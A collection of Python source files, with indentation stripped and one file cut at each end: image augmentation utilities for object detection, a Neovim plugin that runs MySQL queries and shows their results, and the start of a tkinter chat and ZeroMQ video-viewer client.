R[:2] = cv2.getRotationMatrix2D(angle=a, center=(img.shape[1] / 2, img.shape[0] / 2), scale=s)
# Translation
T = np.eye(3)
T[0, 2] = random.uniform(-translate, translate) * img.shape[0] + border # x translation (pixels)
T[1, 2] = random.uniform(-translate, translate) * img.shape[1] + border # y translation (pixels)
# Shear
S = np.eye(3)
S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg)
S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg)
M = S @ T @ R # Combined rotation matrix. ORDER IS IMPORTANT HERE!!
imw = cv2.warpAffine(img, M[:2], dsize=(width, height), flags=cv2.INTER_AREA,
borderValue=(128, 128, 128)) # BGR order borderValue
# Return warped points also
if len(targets) > 0:
n = targets.shape[0]
points = targets[:, 1:5].copy()
area0 = (points[:, 2] - points[:, 0]) * (points[:, 3] - points[:, 1])
# warp points
xy = np.ones((n * 4, 3))
xy[:, :2] = points[:, [0, 1, 2, 3, 0, 3, 2, 1]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1
xy = (xy @ M.T)[:, :2].reshape(n, 8)
# create new boxes
x = xy[:, [0, 2, 4, 6]]
y = xy[:, [1, 3, 5, 7]]
xy = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T
# # apply angle-based reduction of bounding boxes
# radians = a * math.pi / 180
# reduction = max(abs(math.sin(radians)), abs(math.cos(radians))) ** 0.5
# x = (xy[:, 2] + xy[:, 0]) / 2
# y = (xy[:, 3] + xy[:, 1]) / 2
# w = (xy[:, 2] - xy[:, 0]) * reduction
# h = (xy[:, 3] - xy[:, 1]) * reduction
# xy = np.concatenate((x - w / 2, y - h / 2, x + w / 2, y + h / 2)).reshape(4, n).T
# reject warped points outside of image
xy[:, [0, 2]] = xy[:, [0, 2]].clip(0, width)
xy[:, [1, 3]] = xy[:, [1, 3]].clip(0, height)
w = xy[:, 2] - xy[:, 0]
h = xy[:, 3] - xy[:, 1]
area = w * h
ar = np.maximum(w / (h + 1e-16), h / (w + 1e-16))
i = (w > 4) & (h > 4) & (area / (area0 + 1e-16) > 0.1) & (ar < 10)
targets = targets[i]
targets[:, 1:5] = xy[i]
return imw, targets
def cutout(image, labels):
# https://arxiv.org/abs/1708.04552
# https://github.com/hysts/pytorch_cutout/blob/master/dataloader.py
# https://towardsdatascience.com/when-conventional-wisdom-fails-revisiting-data-augmentation-for-self-driving-cars-4831998c5509
h, w = image.shape[:2]
def bbox_ioa(box1, box2, x1y1x2y2=True):
# Returns the intersection over box2 area given box1, box2. box1 is 4, box2 is nx4. boxes are x1y1x2y2
box2 = box2.transpose()
# Get the coordinates of bounding boxes
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
# Intersection area
inter_area = (np.minimum(b1_x2, b2_x2) - np.maximum(b1_x1, b2_x1)).clip(0) * \
(np.minimum(b1_y2, b2_y2) - np.maximum(b1_y1, b2_y1)).clip(0)
# box2 area
box2_area = (b2_x2 - b2_x1) * (b2_y2 - b2_y1) + 1e-16
# Intersection over box2 area
return inter_area / box2_area
# create random masks
scales = [0.5] * 1 # + [0.25] * 4 + [0.125] * 16 + [0.0625] * 64 + [0.03125] * 256 # image size fraction
for s in scales:
mask_h = random.randint(1, int(h * s))
mask_w = random.randint(1, int(w * s))
# box
xmin = max(0, random.randint(0, w) - mask_w // 2)
ymin = max(0, random.randint(0, h) - mask_h // 2)
xmax = min(w, xmin + mask_w)
ymax = min(h, ymin + mask_h)
# apply random color mask
mask_color = [random.randint(0, 255) for _ in range(3)]
image[ymin:ymax, xmin:xmax] = mask_color
# return unobscured labels
if len(labels) and s > 0.03:
box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32)
ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area
labels = labels[ioa < 0.90] # remove >90% obscured labels
return labels
def convert_images2bmp():
# cv2.imread() jpg at 230 img/s, *.bmp at 400 img/s
for path in ['../coco/images/val2014/', '../coco/images/train2014/']:
folder = os.sep + Path(path).name
output = path.replace(folder, folder + 'bmp')
if os.path.exists(output):
shutil.rmtree(output) # delete output folder
os.makedirs(output) # make new output folder
for f in tqdm(glob.glob('%s*.jpg' % path)):
save_name = f.replace('.jpg', '.bmp').replace(folder, folder + 'bmp')
cv2.imwrite(save_name, cv2.imread(f))
for label_path in ['../coco/trainvalno5k.txt', '../coco/5k.txt']:
with open(label_path, 'r') as file:
lines = file.read()
lines = lines.replace('2014/', '2014bmp/').replace('.jpg', '.bmp').replace(
'/Users/glennjocher/PycharmProjects/', '../')
with open(label_path.replace('5k', '5k_bmp'), 'w') as file:
file.write(lines)
def create_folder(path='./new_folder'):
# Create folder
if os.path.exists(path):
shutil.rmtree(path) # delete output folder
os.makedirs(path) # make new output folder
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
From https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
|
__init__.py
|
# -*- coding: utf-8 -*-
import csv
import io
import logging
import os
import threading
import time
import cxnstr
import greenlet
import pymysql
import pymysql.constants.FIELD_TYPE as FT
import pynvim
import six
import nvim_mysql.autocomplete
import nvim_mysql.util
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
NUMERIC_TYPES = [
FT.DECIMAL,
FT.TINY,
FT.SHORT,
FT.LONG,
FT.FLOAT,
FT.DOUBLE,
FT.LONGLONG,
FT.INT24,
FT.NEWDECIMAL,
]
DATE_TYPES = [
FT.TIMESTAMP,
FT.DATE,
FT.TIME,
FT.DATETIME,
FT.YEAR,
FT.NEWDATE,
]
OPTION_DEFAULTS = {
'aliases': None,
'auto_close_results': 0,
'aux_window_pref': 'results',
'use_spinner': 1,
}
SPINNER_CHARS = u"⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏"
class NvimMySQLError(Exception):
pass
def prepend_type_hints_to_header(header, types):
for i, t in enumerate(types):
if t in NUMERIC_TYPES:
header[i] = '#' + header[i]
elif t in DATE_TYPES:
header[i] = '@' + header[i]
def display_value(v):
"""Return the value to display for one particular cell/value."""
if v is None:
v = u'NULL'
elif isinstance(v, bytes):
try:
v = v.decode('utf-8')
v = ' '.join(v.splitlines())
except UnicodeDecodeError:
if six.PY3:
v = '0x' + v.hex()
else:
v = '0x' + v.encode('hex')
else:
v = six.text_type(v)
v = ' '.join(v.splitlines())
return v
def results_to_table(header, rows, types=None):
"""Format query result set as an ASCII table.
If a list of field types is provided (from cursor.description), type hints
will be added to the headers.
Return a list of strings.
"""
header = header[:]
if types:
prepend_type_hints_to_header(header, types)
col_lengths = [max([len(display_value(r)) for r in col]) for col in zip(header, *rows)]
# Table elements.
horizontal_bar = '+' + '+'.join(['-' * (l + 2) for l in col_lengths]) + '+'
def table_row(row):
# Return a database row formatted as a table row.
return '|' + '|'.join(
[u' {:{}} '.format(display_value(v), l) for v, l in zip(row, col_lengths)]) + '|'
return [
horizontal_bar,
table_row(header),
horizontal_bar,
] + [table_row(r) for r in rows] + [
horizontal_bar
]
def results_to_vertical(header, rows, types=None):
"""Format query result set as a series of field: value lines.
Each row will span len(row) lines.
If a list of field types is provided (from cursor.description), type hints
will be added to the headers.
Return a list of strings.
"""
header = header[:]
if types:
prepend_type_hints_to_header(header, types)
header_lengths = [len(h) for h in header]
max_header_length = max(header_lengths)
header_strs = ['{{:>{}}}'.format(max_header_length + 1).format(header[i]) for i in range(len(header))]
output = []
for i, row in enumerate(rows, 1):
if len(rows) > 1:
output.append('***** row {} *****'.format(i))
for j, v in enumerate(row):
output.append('{}: {}'.format(header_strs[j], display_value(v)))
if len(rows) > 1 and i < len(rows):
output.append('')
return output
def results_to_csv(header, rows):
"""Format query result set as a CSV file.
Note that CSV is a text format, so binary data that is not valid utf-8 will
cause an error.
"""
# In Python 2, the csv module can't accept unicode, so we have to give it UTF-8.
# In Python 3, the csv module accepts unicode.
def output_value(v):
if six.PY3:
if isinstance(v, bytes):
return v.decode('utf-8')
else:
if isinstance(v, unicode):
return v.encode('utf-8')
return v
f = six.StringIO()
csv_out = csv.writer(f)
csv_out.writerow([output_value(v) for v in header])
for row in rows:
csv_out.writerow([output_value(v) for v in row])
return f.getvalue().splitlines()
def format_results(results, format_='table', metadata=None):
if metadata is None:
metadata = {}
if results['type'] == 'read':
if format_ == 'table':
lines = results_to_table(results['header'], results['rows'], results['types'])
lines.extend(["", "{} row(s) in set, {} col(s)".format(results['count'], len(results['header']))])
elif format_ == 'csv':
lines = results_to_csv(results['header'], results['rows'])
elif format_ == 'raw_column':
lines = '\n'.join([str(r[0]) for r in results['rows']]).splitlines()
elif format_ == 'vertical':
lines = results_to_vertical(results['header'], results['rows'], results['types'])
else:
raise ValueError("Invalid results format '{}'".format(format_))
elif results['type'] == 'write':
lines = ["", "{} row(s) affected".format(results['count'])]
elif results['type'] == 'error':
lines = results['message'].splitlines()
if format_ == 'table':
duration = metadata.get('duration')
if duration is not None and results['type'] in ['read', 'write']:
lines[-1] += " ({:.2f} sec)".format(duration)
warnings = results.get('warnings')
if warnings:
lines.extend(['', '[warnings]:'])
for warning in warnings:
lines.append("({}) {}".format(warning[1], warning[2]))
query = metadata.get('query')
if query is not None:
lines.extend(['', '---', ''] + query.splitlines())
return lines
class MySQLTab(object):
"""Represents a MySQL-connected tabpage.
Each tab has one (primary) connection to a single server.
"""
AUTOID = 1
def __init__(self, mysql, vim, tabpage):
self.vim = vim
self.mysql = mysql
self.tabpage = tabpage
self.autoid = MySQLTab.AUTOID; MySQLTab.AUTOID += 1
self.conn = None
self.connection_string = None
self.server_name = None
self.status = {
'executing': False,
'killing': False,
'results_pending': False,
}
self.results = None
self.query = None
self.query_start = None
self.query_end = None
self.results_buffer = self._initialize_results_buffer()
self.results_format = None
self.tree = Tree(self)
self.tree_buffer = self._initialize_tree_buffer()
def _initialize_results_buffer(self):
cur_buf = self.vim.current.buffer
# Create
buf_name = "Results{}".format(self.autoid)
self.vim.command("badd {}".format(buf_name))
# Set up
results_buffer = list(self.vim.buffers)[-1]
self.vim.command("b! {}".format(results_buffer.number))
self.vim.command("setl buftype=nofile bufhidden=hide nowrap nonu noswapfile nostartofline")
self.vim.command("nnoremap <buffer> <S-Left> zH")
self.vim.command("nnoremap <buffer> <S-Right> zL")
# close window and go to previous
self.vim.command("nnoremap <buffer> q :let nr = winnr() <Bar> :wincmd p <Bar> :exe nr . \"wincmd c\"<CR>")
self.vim.command("nnoremap <buffer> <Leader>c :MySQLShowResults csv<CR>")
self.vim.command("nnoremap <buffer> <Leader>1 :MySQLShowResults raw_column<CR>")
self.vim.command("nnoremap <buffer> <Leader>t :MySQLShowResults table<CR>")
self.vim.command("nnoremap <buffer> <Leader>G :MySQLShowResults vertical<CR>")
self.vim.command("nnoremap <buffer> <Leader>f :MySQLFreezeResultsHeader<CR>")
# Switch back
self.vim.command("b! {}".format(cur_buf.number))
return results_buffer
def _initialize_tree_buffer(self):
cur_buf = self.vim.current.buffer
# Create
buf_name = "Tree{}".format(self.autoid)
self.vim.command("badd {}".format(buf_name))
# Set up
tree_buffer = list(self.vim.buffers)[-1]
self.vim.command("b! {}".format(tree_buffer.number))
self.vim.command("setl buftype=nofile bufhidden=hide nowrap nonu noswapfile")
self.vim.command("nnoremap <buffer> <Space> :MySQLTreeToggleDatabase<CR>")
self.vim.command("nnoremap <buffer> q :let nr = winnr() <Bar> :wincmd p <Bar> :exe nr . \"wincmd c\"<CR>")
self.vim.command("syn match Directory /^[^ ].*/")
# Switch back
self.vim.command("b! {}".format(cur_buf.number))
return tree_buffer
def set_connection(self, conn, connection_string, server_name):
"""Set this MySQL tab's database connection to conn."""
if self.conn:
self.conn.close()
self.conn = conn
self.connection_string = connection_string
self.server_name = server_name
self.tabpage.vars['MySQLServer'] = server_name
self.tree = Tree(self)
self.tree.refresh_data()
self.tree_buffer[:] = self.tree.render()
def update_status(self, **kwargs):
"""Set one or more status flags for this tab.
Use keyword arguments to do this. Example:
self.update_status(executing=False, results_pending=True)
"""
for k, v in kwargs.items():
if k not in self.status:
raise KeyError
self.status[k] = v
# In case multiple flags are set, the first listed below is the one
# that shows in vim.
status_flag = ''
if self.status['killing']:
status_flag = 'k'
elif self.status['executing']:
status_flag = 'e'
elif self.status['results_pending']:
status_flag = 'r'
logger.debug("status flag: {}".format(status_flag))
self.tabpage.vars['MySQLStatusFlag'] = status_flag
self.mysql.refresh_tabline()
def execute_queries(self, queries, combine_results):
"""Sequentially execute the given queries in this tab.
If there is an error, execution will stop and the error will be
displayed.
Assuming all queries succeed, if combine_results is True,
aggregate counts will be shown after the last query. (Note that
these counts pertain only to "write" queries.) If
combine_results is False, the results of the last query are
shown.
"""
# Ignore if a query is already running.
if self.status['executing']:
return
gr = greenlet.getcurrent()
cursor = self.conn.cursor()
def query_done():
logger.debug("query_done called")
gr.parent = greenlet.getcurrent()
gr.switch()
def run_query(query, result):
logger.debug("run_query called")
try:
cursor.execute(query)
result['description'] = cursor.description
result['rowcount'] = cursor.rowcount
result['rows'] = cursor.fetchall()
cursor.execute("show warnings")
result['warnings'] = cursor.fetchall()
except Exception as e:
result['error'] = "Error: " + repr(e)
else:
result['error'] = None
self.vim.async_call(query_done)
if combine_results:
self.query = ''
self.results = {'type': 'write', 'count': 0, 'warnings': []}
self.update_status(executing=True)
self.query_start = time.time()
for query in queries:
if combine_results:
if self.query:
self.query += '\n\n'
self.query += query
else:
self.query = query
query_result = {}
logger.debug("executing query: {}".format(query))
threading.Thread(target=run_query, args=[query, query_result]).start()
gr.parent.switch()
# Query is done.
if query_result['error']:
self.results = {'type': 'error', 'message': query_result['error']}
break
if combine_results:
# for "write" queries, add to count
if not cursor.description:
self.results['count'] += query_result['rowcount']
self.results['warnings'].extend(query_result['warnings'])
else:
if not query_result['description']:
self.results = {
'type': 'write',
'count': query_result['rowcount'],
'warnings': query_result['warnings'],
}
else:
header = [f[0] for f in query_result['description']]
types = [f[1] for f in query_result['description']]
rows = query_result['rows']
self.results = {
'type': 'read',
'header': header,
'types': types,
'rows': rows,
'count': query_result['rowcount'],
'warnings': query_result['warnings'],
}
self.query_end = time.time()
cursor.close()
self.update_status(executing=False, killing=False)
# TODO: Differentiate results pending from error pending?
self.update_status(results_pending=True)
self.vim.command('MySQLShowResults table {}'.format(self.autoid))
def execute_query(self, query):
"""Execute the given query in this tab.
Results will be displayed if appropriate when the query finishes.
"""
self.execute_queries([query], False)
def complete(self, findstart, base):
create_new_conn = self.status['executing']
if create_new_conn:
logger.debug("query is executing, so creating new connection for autocomplete")
db_params = cxnstr.to_dict(self.connection_string)
conn = pymysql.connect(use_unicode=True, **db_params)
else:
logger.debug("using existing connection for autocomplete")
conn = self.conn
result = nvim_mysql.autocomplete.complete(findstart, base, self.vim, conn.cursor())
if create_new_conn:
logger.debug("closing autocomplete connection")
conn.close()
return result
def get_aux_window(self, target):
target_buffer = self.results_buffer if target == 'results' else self.tree_buffer
for window in self.vim.current.tabpage.windows:
if window.buffer == target_buffer:
return window
return None
def get_results_window(self):
return self.get_aux_window('results')
def get_tree_window(self):
return self.get_aux_window('tree')
def open_aux_window(self, target):
# If target window is already open, jump to it.
target_window = self.get_aux_window(target)
if target_window is not None:
logger.debug("{} window is already open in this tab".format(target))
self.vim.command('{}wincmd w'.format(target_window.number))
return
# If not, open it.
# First, check to see if we'll need to give the other window precedence.
other = 'tree' if target == 'results' else 'results'
other_window = self.get_aux_window(other)
reopen_other_window = other_window is not None and self.mysql.get_option('aux_window_pref') == other
if reopen_other_window:
# If so, close for now (then we'll re-open).
self.vim.command("{}wincmd c".format(other_window.number))
# Open target window.
if target == 'results':
result_win_height = int(self.vim.current.window.height * 0.35)
split_command = "botright {} split".format(result_win_height)
else:
tree_win_width = int(self.vim.current.window.width * 0.17)
split_command = "vertical topleft {} split".format(tree_win_width)
logger.debug("split command: {}".format(split_command))
self.vim.command(split_command)
target_buffer = self.results_buffer if target == 'results' else self.tree_buffer
self.vim.command("b! {}".format(target_buffer.number))
if reopen_other_window:
self.open_aux_window(other)
# switch back to our window
self.vim.command("{}wincmd w".format(self.get_aux_window(target).number))
def open_results_window(self):
self.open_aux_window('results')
def open_tree_window(self):
self.open_aux_window('tree')
def close(self):
try:
self.conn.close()
except:
pass
self.vim.command("bd! {}".format(self.results_buffer.number))
self.vim.command("bd! {}".format(self.tree_buffer.number))
@pynvim.plugin
class MySQL(object):
"""Plugin interface to neovim."""
def __init__(self, vim):
self.vim = vim
self.tabs = {}
self.initialized = False
logger.debug("plugin loaded by host")
def get_option(self, name):
return self.vim.vars.get('nvim_mysql#{}'.format(name), OPTION_DEFAULTS[name])
@pynvim.command('MySQLConnect', nargs=1, sync=True)
def connect(self, args):
"""Use the given connection_string to connect the current tabpage to a MySQL server."""
target = args[0]
aliases = self.get_option('aliases')
if aliases is not None and target in aliases:
logger.debug("'{}' is an alias for '{}'".format(target, aliases[target]))
connection_string = aliases[target]
server_name = target
else:
connection_string = target
server_name = None
db_params = cxnstr.to_dict(connection_string)
if server_name is None:
server_name = db_params['host']
logger.debug("connecting to {}".format(connection_string))
conn = pymysql.connect(use_unicode=True, **db_params)
conn.autocommit(True)
logger.debug("connection succeeded")
tabpage = self.vim.current.tabpage
if tabpage in self.tabs:
logger.debug("this tab is already MySQL-connected, will replace connection")
tab = self.tabs[tabpage]
else:
logger.debug("this tab is not MySQL-connected, will initialize")
tab = self.tabs[tabpage] = MySQLTab(self, self.vim, tabpage)
tab.set_connection(conn, connection_string, server_name)
if self.vim.current.buffer.name == '' and 'current_syntax' not in self.vim.current.buffer.vars:
self.vim.command('set ft=mysql')
if not self.initialized:
self._initialize()
self.refresh_tabline()
@pynvim.command('MySQLExecQueryUnderCursor', sync=False)
def exec_query_under_cursor(self):
"""Execute the query under the cursor.
This command assumes that all queries are separated by at least one
blank line.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
query, _ = nvim_mysql.util.get_query_under_cursor(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1,
self.vim.current.window.cursor[1]
)
if query is not None:
current_tab.execute_query(query)
@pynvim.command('MySQLExecQueriesInRange', range='', sync=False)
def exec_queries_in_range(self, range):
"""Execute the queries in the visual selection.
Results of individual queries are not shown.
This command assumes that all queries are separated by at least one
blank line.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
queries = nvim_mysql.util.get_queries_in_range(self.vim.current.buffer, range[0] - 1, range[1] - 1)
current_tab.execute_queries(queries, len(queries) > 1)
def _run_query_on_table_under_cursor(self, query_fmt):
"""Run a query on the table under the cursor."""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
# Special handling for tables in the tree buffer.
if self.vim.current.buffer == current_tab.tree_buffer:
# Ignore if we're on a database row.
if not self.vim.current.line.startswith(' '):
return
table = self.vim.current.line.strip()
database, _, _ = nvim_mysql.util.get_parent_database_in_tree(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1
)
table = database + '.' + table
else:
word = nvim_mysql.util.get_word_under_cursor(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1,
self.vim.current.window.cursor[1]
)
table = nvim_mysql.util.word_to_table(word)
if nvim_mysql.util.table_exists(current_tab.conn, table):
query = query_fmt.format(table)
current_tab.execute_query(query)
else:
raise NvimMySQLError("Table '{}' does not exist".format(table))
@pynvim.command('MySQLDescribeTableUnderCursor', sync=False)
def describe_table_under_cursor(self):
"""Describe the table under the cursor."""
self._run_query_on_table_under_cursor("describe {}")
@pynvim.command('MySQLShowIndexesFromTableUnderCursor', sync=False)
def show_indexes_from_table_under_cursor(self):
"""Show indexes from the table under the cursor."""
self._run_query_on_table_under_cursor("show indexes from {}")
@pynvim.command('MySQLSampleTableUnderCursor', sync=False)
def sample_table_under_cursor(self):
"""Select a sampling of rows from the table under the cursor."""
self._run_query_on_table_under_cursor("select * from {} limit 100")
@pynvim.command('MySQLSelectAllFromTableUnderCursor', sync=False)
def select_all_from_table_under_cursor(self):
"""Select all rows from the table under the cursor."""
self._run_query_on_table_under_cursor("select * from {}")
@pynvim.command('MySQLCountTableUnderCursor', sync=False)
def count_table_under_cursor(self):
"""Select count(*) from the table under the cursor."""
self._run_query_on_table_under_cursor("select count(*) from {}")
@pynvim.command('MySQLKillQuery', sync=True)
def kill_query(self):
"""Kill the query currently executing in the current tabpage.
This command creates an additional connection to the server to
kill the query.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
# If there's no running query, ignore.
if not current_tab.status['executing']:
raise NvimMySQLError("No query is currently running in this tab")
current_tab.update_status(killing=True)
query_id = current_tab.conn.thread_id()
logger.debug("thread id: {}".format(query_id))
db_params = cxnstr.to_dict(current_tab.connection_string)
conn = pymysql.connect(use_unicode=True, **db_params)
try:
cursor = conn.cursor()
cursor.execute("kill query {}".format(query_id))
finally:
conn.close()
logger.debug("done killing query")
@pynvim.command('MySQLShowResults', nargs='*', sync=True)
def show_results(self, args):
"""Display the results buffer.
:MySQLShowResults <format> <tab_autoid>
Both arguments are optional, but format must be specified if tab_autoid
is specified.
format can be one of 'table' (the default), 'csv', or 'raw_column'.
'table' is an ASCII table format, similar to the standard MySQL client.
'csv' formats the result set as a CSV file.
'raw_column' is a raw view of a single column (the first column, if the
result set contains more than one). For a 1x1 result set, this format
lets you see the raw data of a single data point, which can be helpful
for long text fields and/or text fields with newlines. It's also useful
for quickly extracting a list of field names from DESCRIBE output.
If tab_autoid is specified, only show the results if we are currently
in the MySQLTab with the given autoid. If tab_autoid is not specified,
show the results no matter what.
"""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
logger.debug("show_results args: {}".format(args))
if len(args) > 1:
tab_autoid = int(args[1])
else:
tab_autoid = None
if len(args) > 0:
format_ = args[0]
if format_ not in ['table', 'csv', 'raw_column', 'vertical']:
raise NvimMySQLError("Invalid results format '{}'".format(format_))
else:
format_ = 'table'
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
if tab_autoid is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
else:
return
# If we were called with a specific tab number and we're not in
# that tab, ignore.
if tab_autoid is not None and tab_autoid != current_tab.autoid:
return
current_tab.open_results_window()
if current_tab.query and (current_tab.status['results_pending'] or format_ != current_tab.results_format):
metadata = {
'query': current_tab.query,
'duration': current_tab.query_end - current_tab.query_start,
}
current_tab.results_buffer[:] = format_results(current_tab.results, format_, metadata)
current_tab.results_format = format_
self.vim.command("normal gg0")
current_tab.update_status(results_pending=False)
# If this was done automatically, switch back to wherever the user was.
if tab_autoid is not None:
self.vim.command('wincmd p')
@pynvim.command('MySQLFreezeResultsHeader', sync=True)
def freeze_results_header(self):
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
if current_tab.results_buffer != self.vim.current.buffer:
raise NvimMySQLError("This command can only be run in results buffer")
self.vim.feedkeys("""gg^:=winheight('%')-4
sp
L3jH^:se scb
k:se scb
:se sbo=hor
j""")
@pynvim.command('MySQLShowTree', sync=True)
def show_tree(self):
"""Display the tree buffer."""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
current_tab.open_tree_window()
current_tab.tree.refresh_data()
current_tab.tree_buffer[:] = current_tab.tree.render()
@pynvim.command('MySQLTreeToggleDatabase', sync=True)
def tree_toggle_database(self):
"""Open or close the nearest database in the tree."""
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
if current_tab is None:
raise NvimMySQLError("This is not a MySQL-connected tabpage")
if current_tab.tree_buffer != self.vim.current.buffer:
raise NvimMySQLError("This command can only be run in tree buffer")
database, expanded, row = nvim_mysql.util.get_parent_database_in_tree(
self.vim.current.buffer,
self.vim.current.window.cursor[0] - 1
)
if expanded:
current_tab.tree.close(database)
else:
current_tab.tree.open(database)
current_tab.tree.refresh_data()
current_tab.tree_buffer[:] = current_tab.tree.render()
self.vim.current.window.cursor = [row + 1, 0]
@pynvim.function('MySQLComplete', sync=True)
def complete(self, args):
findstart, base = args
if not self.initialized:
raise NvimMySQLError("Use MySQLConnect to connect to a database first")
current_tab = self.tabs.get(self.vim.current.tabpage, None)
# If this isn't a MySQL tab, ignore.
if current_tab is None:
return 0 if findstart else []
return current_tab.complete(findstart, base)
@pynvim.autocmd('TabClosed', sync=True)
def cleanup_tabs_on_tabclosed(self):
if self.initialized:
self.cleanup_tabs()
def cleanup_tabs(self):
logger.debug("number of open tabs: {}".format(len(self.vim.tabpages)))
for nvim_tab, mysql_tab in list(self.tabs.items()):
if nvim_tab not in self.vim.tabpages:
logger.debug("tab w/ handle {} is not longer open. closing.".format(nvim_tab.handle))
mysql_tab.close()
del self.tabs[nvim_tab]
@pynvim.autocmd('WinEnter', sync=True)
def auto_close_aux_windows_on_winenter(self):
"""Close remaining windows in tab when all are disposable."""
if self.initialized:
def closeable(window):
auto_close_results = bool(self.get_option('auto_close_results'))
is_results_window = window.buffer == current_tab.results_buffer
is_tree_window = window.buffer == current_tab.tree_buffer
return (auto_close_results and is_results_window) or is_tree_window
tabpage = self.vim.current.tabpage
current_tab = self.tabs.get(tabpage, None)
if current_tab is not None:
if all(closeable(w) for w in tabpage.windows):
for _ in range(len(tabpage.windows)):
self.vim.command('q')
# We have to call this manually because the TabClosed
# autocommand doesn't appear to be called when using
# vim.command.
self.cleanup_tabs()
def _initialize(self):
logger.debug("initializing plugin")
self.initialized = True
tabline_file = os.path.join(os.path.dirname(__file__), 'tabline.vim')
self.vim.command('source {}'.format(tabline_file))
# Set up autocomplete
self.vim.command('set completefunc=MySQLComplete')
self.refresh_tabline()
if self.get_option('use_spinner'):
self.start_spinner()
logger.debug("plugin initialized")
def refresh_tabline(self, spinner_char=None):
if spinner_char:
self.vim.vars['nvim_mysql#spinner_char'] = spinner_char
self.vim.command('set showtabline=2 tabline=%!MySQLTabLine()')
def start_spinner(self):
def spin():
i = 0
while True:
i = i % len(SPINNER_CHARS)
self.vim.async_call(self.refresh_tabline, SPINNER_CHARS[i])
time.sleep(.1)
i += 1
t = threading.Thread(target=spin)
t.daemon = True
t.start()
class Tree(object):
"""Internal representation of tree view."""
def __init__(self, tab):
self.tab = tab
self.data = {} # {db: {expanded: bool, objects: [str]}}
def refresh_data(self):
cursor = self.tab.conn.cursor()
cursor.execute("show databases")
databases = [r[0] for r in cursor.fetchall()]
# Remove databases that are no longer listed
for database in self.data:
if database not in databases:
del self.data[database]
# Add new databases
for database in databases:
if database not in self.data:
self.data[database] = {'expanded': False, 'objects': []}
# Update objects for expanded databases
for database in self.data:
if self.data[database]['expanded']:
cursor.execute("show tables from {}".format(database))
tables = [r[0] for r in cursor.fetchall()]
self.data[database]['objects'] = tables
def open(self, database):
self.data[database]['expanded'] = True
def close(self, database):
self.data[database]['expanded'] = False
def render(self):
s = ''
for database in sorted(self.data):
s += database
s += u' ▾' if self.data[database]['expanded'] else u' ▸'
s += '\n'
if self.data[database]['expanded']:
s += ' ' + '\n '.join(self.data[database]['objects']) + '\n'
return s.splitlines()
|
main_client.py
|
import tkinter
import socket
from threading import Thread
import cv2
import zmq
import base64
import numpy as np
IP = ""
PORT = 0
class Viewer:
context = zmq.Context()
footage_socket = context.socket(zmq.SUB)
def __init__(self):
self.footage_socket.connect('tcp://'+IP+':5555')
self.footage_socket.setsockopt_string(zmq.SUBSCRIBE, np.unicode(''))
def video(self):
while True:
try:
frame = self.footage_socket.recv_string()
img = base64.b64decode(frame)
npimg = np.fromstring(img, dtype=np.uint8)
source = cv2.imdecode(npimg, 1)
cv2.imshow("Stream", source)
cv2.waitKey(1)
except KeyboardInterrupt:
cv2.destroyAllWindows()
break
def run(self):
videoThread=Thread(target=self.video)
videoThread.daemon=True
videoThread.start()
def recv_message(sock):
while True:
msg = sock.recv(1024)
chat_list.insert(tkinter.END, msg.decode())
chat_list.see(tkinter.END)
def connect(event=None):
global IP, PORT
connect_string = input_string.get()
addr = connect_string.split(":")
IP = addr[0]
PORT = int(addr[1])
w_connect.destroy()
def send_message(event=None):
msg = input_msg.get()
sock.send(msg.encode())
input_msg.set("")
if msg == "/bye":
sock.close()
window.quit()
#접속 창
w_connect = tkinter.Tk()
w_connect.title("접속대상")
tkinter.Label(w_connect, text="접속대상").grid(row = 0, column = 0)
input_string = tkinter.StringVar(value="127.0.0.1:10000")
